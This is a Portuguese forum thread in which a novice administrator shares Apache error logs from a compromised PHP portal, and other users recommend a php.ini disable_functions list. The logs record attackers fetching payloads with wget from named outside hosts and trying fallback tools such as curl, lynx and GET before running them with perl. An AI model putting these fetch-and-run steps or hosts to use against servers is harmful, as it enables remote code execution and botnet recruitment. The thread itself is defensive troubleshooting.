+ Responder ao Tópico



  1. #1

    Padrão ajuda com segurança no Apache

    Preciso de ajuda com o Apache pessoal, sou novo no linux e vi que nos errors.log do apache estão aparecendo algumas coisas estranhas e preciso da ajuda de vocês.

    Aqui vai um pedaço do log


    sh: line 1: curl: command not found
    --14:38:15-- http://teampcc.iespana.es/enlild
    => `enlild'
    Resolving teampcc.iespana.es... 82.196.5.222
    Connecting to teampcc.iespana.es[82.196.5.222]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 27,394 [text/plain]

    0K .......... .......... ...... 100% 13.73 KB/s

    14:38:18 (13.73 KB/s) - `enlild' saved [27394/27394]

    sh: line 1: curl: command not found
    --03:19:40-- http://teampcc.iespana.es/enlild
    => `enlild'
    Resolving teampcc.iespana.es... 82.196.5.222
    Connecting to teampcc.iespana.es[82.196.5.222]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 27,394 [text/plain]

    0K .......... .......... ...... 100% 18.57 KB/s

    03:19:43 (18.57 KB/s) - `enlild' saved [27394/27394]

    sh: line 1: curl: command not found
    --06:47:44-- http://teampcc.iespana.es/enlild
    => `enlild'
    Resolving teampcc.iespana.es... 82.196.5.222
    Connecting to teampcc.iespana.es[82.196.5.222]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 27,394 [text/plain]

    0K .......... .......... ...... 100% 33.84 KB/s

    06:47:46 (33.84 KB/s) - `enlild' saved [27394/27394]

    sh: line 1: curl: command not found
    sh: line 1: curl: command not found
    Can't open perl script "a.txt": No such file or directory
    Can't open perl script "a.txt": No such file or directory
    sh: line 1: lwp-download: command not found
    Can't open perl script "a.txt": No such file or directory
    sh: line 1: lynx: command not found
    sh: line 1: lwp-download: command not found
    sh: line 1: fetch: command not found
    sh: line 1: lynx: command not found
    Can't open perl script "a.txt": No such file or directory
    sh: line 1: GET: command not found
    sh: line 1: fetch: command not found
    --06:47:59-- http://www.digwnz.kit.net/a.txt
    => `a.txt'
    Resolving Kit.net - 403... Can't open perl script "a.txt": No such file or directory
    sh: line 1: GET: command not found
    --06:47:59-- http://www.digwnz.kit.net/a.txt
    => `a.txt'
    Resolving Kit.net - 403... 201.7.184.2
    Connecting to Kit.net - 403[201.7.184.2]:80... 201.7.184.2
    Connecting to Kit.net - 403[201.7.184.2]:80... connected.
    HTTP request sent, awaiting response... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 29,678 [text/plain]

    0K ...200 OK
    Length: 29,678 [text/plain]
    a.txt has sprung into existence.
    Retrying.

    ....... .......... ........ 100% 83.38 KB/s

    06:48:00 (83.38 KB/s) - `a.txt' saved [29678/29678]

    --06:48:01-- http://www.digwnz.kit.net/a.txt
    (try: 2) => `a.txt.1'
    Connecting to Kit.net - 403[201.7.184.2]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 29,678 [text/plain]

    0K .......... .......... ........ 100% 115.77 KB/s

    06:48:01 (115.77 KB/s) - `a.txt.1' saved [29678/29678]

    Can't open perl script "a.txt": No such file or directory
    sh: line 1: curl: command not found
    Can't open perl script "a.txt": No such file or directory
    sh: line 1: lwp-download: command not found
    Can't open perl script "a.txt": No such file or directory
    sh: line 1: lynx: command not found
    sh: line 1: fetch: command not found
    sh: line 1: GET: command not found
    --06:48:01-- http://www.digwnz.kit.net/a.txt
    => `a.txt'
    Resolving Kit.net - 403... 201.7.184.2
    Connecting to Kit.net - 403[201.7.184.2]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 29,678 [text/plain]

    0K .......... .......... ........ 100% 117.47 KB/s

    06:48:02 (117.47 KB/s) - `a.txt' saved [29678/29678]


    Não entendo o que ta acontecendo, parece que usam meu servidor pra baixar sripts mas depois não conseguem executar. Alguém sabe me dizer oq ta acontecendo nesses logs?

  2. #2

    Padrão

    seu servidor esta com algum bug (algum site talvez)

    alguem esta conseguindo executar comandos e baixar coisas.. pelo que vi ai.. sao BOT (robos) que ficam online a espera de comandos, um dos comandos que vi foi "pacotes" que.. eh gerar um ataque a uma maquina remota...



  3. #3

    Padrão

    Neste servidor tenho um site em que é um portal aqui da minha região feito em php. Com certeza está cheio de furos esse php do portal. Ja instalei o mod_security e bloquei algumas coisas como php_injection e queria saber como bloquer esse tipo de coisa que o log esta me mostrando. Poderia me ajudar? por onde eles executam esses comandos pra baixar arquivos? através de um form em php será?

  4. #4

    Padrão

    acho que voce precisa verificar urgente estes arquivos do portal...

    para proibir basta editar o php.ini e na linha disable_functions substituir por essa:
    Código :
    disable_functions = exec,shell_exec,system,passthru,popen,pclose,proc_open,proc_nice,proc_terminate,proc_get_status,proc_close,pfsockopen,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,escapeshellcmd,escapeshellarg

    eu duvido que ele vai conseguir executar algo pelo php...



  5. #5

    Padrão

    Citação Postado originalmente por alexandrecorrea Ver Post
    acho que voce precisa verificar urgente estes arquivos do portal...

    para proibir basta editar o php.ini e na linha disable_functions substituir por essa:
    Código :
    disable_functions = exec,shell_exec,system,passthru,popen,pclose,proc_open,proc_nice,proc_terminate,proc_get_status,proc_close,pfsockopen,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,escapeshellcmd,escapeshellarg

    eu duvido que ele vai conseguir executar algo pelo php...
    desculpe minha burrice, esses parâmetros vão no php.ini né? e outra
    com tanto parametro asssim não corro o risco de algumas funcionalidades do site
    pararem de funcionar? ja que o site foi construido e é adminstrado em php por um
    módulo do próprio site.

  6. #6

    Padrão

    sim no php.ini

    credio que nao perdera a funcionalidade pois estas funcoes sao apenas de EXECUCAO de processos DENTRO do servidor !! site nenhum tem necessidade destas funcoes..



  7. #7

    Padrão

    cara, muito obrigado pela ajuda, muito obrigado mesmo! não querendo abusar mas ja abusando hehe, você entende alguma coisa de postfix? tenho um servidor rodando aqui e postei uma dúvida na parte sobre postfix, se puder me ajudar fico grato.